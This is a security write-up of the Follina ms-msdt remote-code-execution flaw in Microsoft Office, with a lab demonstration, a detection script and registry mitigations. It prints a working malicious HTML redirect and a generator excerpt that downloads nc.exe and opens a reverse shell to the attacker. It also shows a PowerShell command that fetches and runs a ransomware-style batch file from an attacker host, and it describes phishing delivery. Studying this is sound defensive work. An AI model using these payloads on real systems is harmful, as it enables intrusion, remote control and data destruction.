Vulnerability overview

This vulnerability allows remote code execution through msdt.exe when the MS-MSDT URL protocol is used.

It can occur because applications and HTML links on Windows support a URI protocol handler called search-ms, a custom search feature.

Microsoft states that the issue has now been fixed in patch KB5014699, but attacks exploiting the vulnerability are still being carried out.

Malicious samples usually start the attack through an MS Office document: the malicious docx file contains a URL that downloads a further malicious html file.

That html file contains JavaScript that redirects to a URL using the MS-MSDT protocol described above.

When Windows is redirected to the ms-msdt protocol after the docx is opened, it invokes MSDT.EXE, and at that point the malicious code specified by the attacker is passed as an argument and executed.

  • Malicious html file

      ```html
      ...
              <script>
      /*
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/
      window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
      </script>
      </body>
      </html>
      ```
    

Affected versions

  • Versions prior to the KB5014699 patch

  • Several versions, including MS Office 2021

Vulnerability demonstration

calc.exe

```
Name      Environment                              IP
Attacker  Kali Linux                               192.168.124.134
Victim    Windows 10 64bit 1903, MS Office 2021    192.168.124.132
```

In the environment used here, Defender classifies the exploit docx file as malicious, so real-time protection is turned off, as shown above, before the test is run.

Run python3 exploit.py generate http://192.168.124.134:{port} on Kali to prepare the docx file for the exploit.

Run sudo python3 exploit.py host {port} on Kali to serve the payload and log the victim's connection.

The generated file is located at ./out/document.docx and is delivered to the victim by phishing or another medium. If the victim opens the file without suspicion, MSDT is launched as shown below and the predefined calc.exe is executed.

Remote shell and ransomware

This git repository is an RCE that, instead of stopping at the earlier calc.exe command, downloads an nc.exe file and makes it connect back directly in order to establish a remote shell.

```python
# Excerpt from the repository's follina.py as shown on the page (the steps after the document .rels file is rewritten)
with open(document_rels_path, "w") as filp:
    filp.write(external_referral)

# Rebuild the original office file
shutil.make_archive(args.output, "zip", doc_path)
os.rename(args.output + ".zip", args.output)

print(f"[+] created maldoc {args.output}")

command = args.command
if args.reverse:
    command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

# Base64 encode our command so whitespace is respected
base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
```

In this way the command downloads nc.exe through PowerShell and connects back.

Compared with the earlier calc.exe payload, the command is not passed as a plain string but is Base64-encoded, which serves as a first layer of obfuscation.
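As an added example (not code from the page or the repository), the following Python triage function pulls the ms-msdt URI out of an HTML stage, flags the structural indicators shared by both payload forms on this page, and recovers the embedded command, whether passed inline through IEX('...') as in the html file shown earlier or Base64-wrapped as in the follina.py fragment above. The two sample strings are constructed from those forms with a placeholder calc.exe command.

```python
import base64
import re

# Constructed samples of the redirect line (test input, not the page's files), with a
# placeholder calc.exe command. Plain form, as in the html file shown earlier:
SAMPLE_PLAIN = (
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"'
    'IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(\'calc.exe\'))i'
    '/../../../../Windows/System32/mpsigstub.exe \\"";'
)
# Base64-wrapped form, as produced by the follina.py fragment above:
SAMPLE_B64 = base64.b64encode(b"calc.exe").decode()
SAMPLE_WRAPPED = (
    'location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? '
    "IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression("
    "'[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58"
    "+[char]58+'FromBase64String('+[char]34+'" + SAMPLE_B64 + "'+[char]34+'))'))))i"
    '/../../../../Windows/System32/mpsigstub.exe\\""; //'
)

# The URI sits in a JS string literal: consume escaped characters, stop at the closing quote.
MSDT_URI = re.compile(r'ms-msdt:(?:\\.|[^"\\])*', re.IGNORECASE)
IEX_ARG = re.compile(r"IEX\('([^']*)'\)")
B64_ARG = re.compile(r"FromBase64String\('\+\[char\]34\+'([A-Za-z0-9+/=]+)'")
STATIC_MARKS = [("pcwdiagnostic", "pcw_diagnostic_pack"), ("$(", "powershell_subexpression"),
                ("/../", "path_traversal"), ("mpsigstub.exe", "mpsigstub_target")]

def analyze_html(html: str) -> dict:
    """Extract the ms-msdt URI, its structural indicators and the command it carries."""
    m = MSDT_URI.search(html)
    if not m:
        return {"msdt_uri": None, "indicators": [], "command": None}
    uri = m.group(0)
    indicators = [label for mark, label in STATIC_MARKS if mark in uri.lower()]
    command = None
    iex, b64 = IEX_ARG.search(uri), B64_ARG.search(uri)
    if iex:
        indicators.append("iex_inline_command")
        command = iex.group(1)
    elif b64:
        indicators.append("base64_wrapped_command")
        command = base64.b64decode(b64.group(1)).decode("utf-8", "replace")
    if len(html) > 4096:  # the stage is padded past 4096 bytes, as the generator's comment says
        indicators.append("padded_over_4096_bytes")
    return {"msdt_uri": uri, "indicators": indicators, "command": command}
```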

Back on Kali, running python3 follina.py -p {port} -l {listening port} generates follina.doc, which is likewise sent to the victim, for example by phishing.

Afterwards, if MSDT launches normally from that doc file on the victim's PC, a session is established as shown below.

It can also be seen that nc.exe has been downloaded to the C:\Windows\Tasks directory.

The C:\USERS\USR\DESKTOP\TEST directory currently contains the test files listed below. We test whether the ransomware and malicious code behave as expected when run.

```
C:\USERS\USR\DESKTOP\TEST
│  1.txt
│  2.txt
│  3.txt
│  4.txt
│  5.txt
│
├─A
│  │  1.txt
│  │  2.txt
│  │  3.txt
│  │  4.txt
│  │  5.txt
│  │
│  └─C
│          1.txt
│          2.txt
│          3.txt
│          4.txt
│          5.txt
│
└─B
        1.txt
        2.txt
        3.txt
        4.txt
        5.txt
```

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -noni -nop -c "(new-Object System.Net.WebClient).DownloadFile('http://{AttackIP}/extension_rename.bat','C:\Users\usr\Desktop\Test\extension_rename.bat');"&& cd C:\Users\usr\Desktop\Test&& extension_rename.bat
```

This command uses powershell.exe to download a file from the attacker's server and execute it; after it runs, every file in the Test directory has been changed, as can be seen below.

```
C:\USERS\USR\DESKTOP\TEST
│  1.ransom
│  2.ransom
│  3.ransom
│  4.ransom
│  5.ransom
│  extension_rename.ransom
│
├─A
│  │  1.ransom
│  │  2.ransom
│  │  3.ransom
│  │  4.ransom
│  │  5.ransom
│  │
│  └─C
│          1.ransom
│          2.ransom
│          3.ransom
│          4.ransom
│          5.ransom
│
└─B
        1.ransom
        2.ransom
        3.ransom
        4.ransom
        5.ransom
```

Mitigation

  • Apply the KB5014699 patch

  • Disable the protocol

    • Run a command prompt as administrator.

    • Run reg export HKEY_CLASSES_ROOT\ms-msdt [backup file name] to back up the registry key.

    • Run reg delete HKEY_CLASSES_ROOT\ms-msdt /f to delete the registry key.

  • Restore the MSDT URL protocol registry key

    • Run a command prompt as administrator.

    • Run reg import [backup file name] to restore the registry key.

Reference